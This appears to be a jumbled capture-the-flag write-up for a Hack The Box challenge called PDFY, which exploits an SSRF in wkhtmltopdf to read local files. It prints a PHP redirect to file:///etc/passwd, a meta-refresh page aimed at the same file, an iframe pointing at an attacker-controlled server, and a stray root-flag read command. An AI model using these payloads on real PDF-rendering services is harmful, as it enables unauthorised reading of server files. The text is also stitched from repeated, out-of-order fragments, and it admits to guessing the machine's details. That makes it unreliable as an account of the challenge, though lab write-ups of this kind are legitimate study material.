This updated write‑up covers the core vulnerability (an SSRF in wkhtmltopdf ), two practical attack strategies, and a step‑by‑step walkthrough to capture the flag.
First, start a simple PHP web server on your local machine:
<?php header('Location: file:///etc/passwd'); ?> pdfy htb writeup upd
PDFY IP Address: 10.10.11.27 Difficulty: Medium OS: Linux Release Date: May 2024 (approx.)
Here’s a for a Hack The Box write‑up on the machine PDFY (assuming it’s a typical HTB machine involving PDF parsing, file uploads, or command injection via PDF metadata). This updated write‑up covers the core vulnerability (an
The generated PDF will contain the contents of /etc/passwd , where the flag is appended. Download or view the PDF to obtain the flag.
cat /root/root.txt
The wkhtmltopdf tool will process this HTML, see the <iframe> , and make a request to the URL within it ( http://our-server.com/axura.php?... ). Our script, axura.php , will then respond with a redirect to file:///etc/passwd . The wkhtmltopdf tool will faithfully follow this redirect as well, and attempt to include the content of the local file into the PDF.
<!DOCTYPE html> <html> <head> <meta http-equiv="refresh" content="0; url=file:///etc/passwd" /> </head> <body> <p>Redirecting...</p> </body> </html> Download or view the PDF to obtain the flag
→ Unsafe concatenation.
The SSRF vulnerability in wkhtmltopdf can be triggered by inserting an iframe that points to an internal asset’s IP address or a local file, causing the tool to fetch the embedded resource.